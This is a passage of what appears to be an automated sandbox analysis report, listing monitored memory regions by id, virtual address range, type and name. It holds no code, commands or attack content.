"pagefile_0x0000000001e80000" filename = "" Region: id = 9107 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9108 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9109 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9110 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9111 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9112 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9113 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9114 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9115 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9116 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9117 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9118 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9119 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9120 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9121 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9122 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9123 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9124 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9125 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9126 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9127 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9128 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9129 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9130 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9131 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9132 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9133 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9134 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9135 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 9136 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 9137 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9138 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9139 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 9140 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 9141 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9142 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9143 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9144 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9145 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9146 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9147 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9148 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9149 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9150 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9151 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9152 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9153 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9154 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9155 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9156 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9157 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9158 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9159 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9160 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9161 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9162 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9163 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9164 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9165 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9166 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9167 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 9168 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 9169 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9170 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9171 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9172 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9173 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9174 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9175 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9176 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9177 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9178 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9179 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9180 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9181 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9182 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9183 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9184 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9185 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9186 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9187 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9188 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9189 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9190 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9191 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9192 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9193 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9194 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9195 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9196 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9197 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9198 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9199 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9200 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9201 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9202 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9203 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9204 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9205 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9206 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9207 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9208 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9209 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9210 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9211 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9212 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9213 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9214 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9215 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9216 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9217 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9218 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9219 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9220 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9221 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9222 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9223 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9224 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9225 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9226 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9227 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9228 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9229 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9230 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9231 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9232 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9233 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9234 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9235 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9236 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9237 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9238 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9239 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9240 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9241 start_va = 0x1e80000 end_va = 0x1e8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 9242 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 9243 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9244 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9245 start_va = 0x1e80000 end_va = 0x1e8efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e80000" filename = "" Region: id = 9246 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9247 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9248 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9249 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9250 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9251 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9252 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9253 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9254 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 9255 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 9256 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9257 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9258 start_va = 0x610000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 9259 start_va = 0x3d50000 end_va = 0x3d6bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003d50000" filename = "" Region: id = 9260 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9261 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9262 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9263 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9264 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9265 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9266 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9267 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9268 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9269 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9270 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9271 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9272 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9273 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9274 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9275 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9276 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9277 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9278 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9279 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9280 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9281 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9282 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9283 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9284 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9285 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9286 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9287 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9288 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9289 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9290 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 9291 start_va = 0x610000 end_va = 0x61efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id 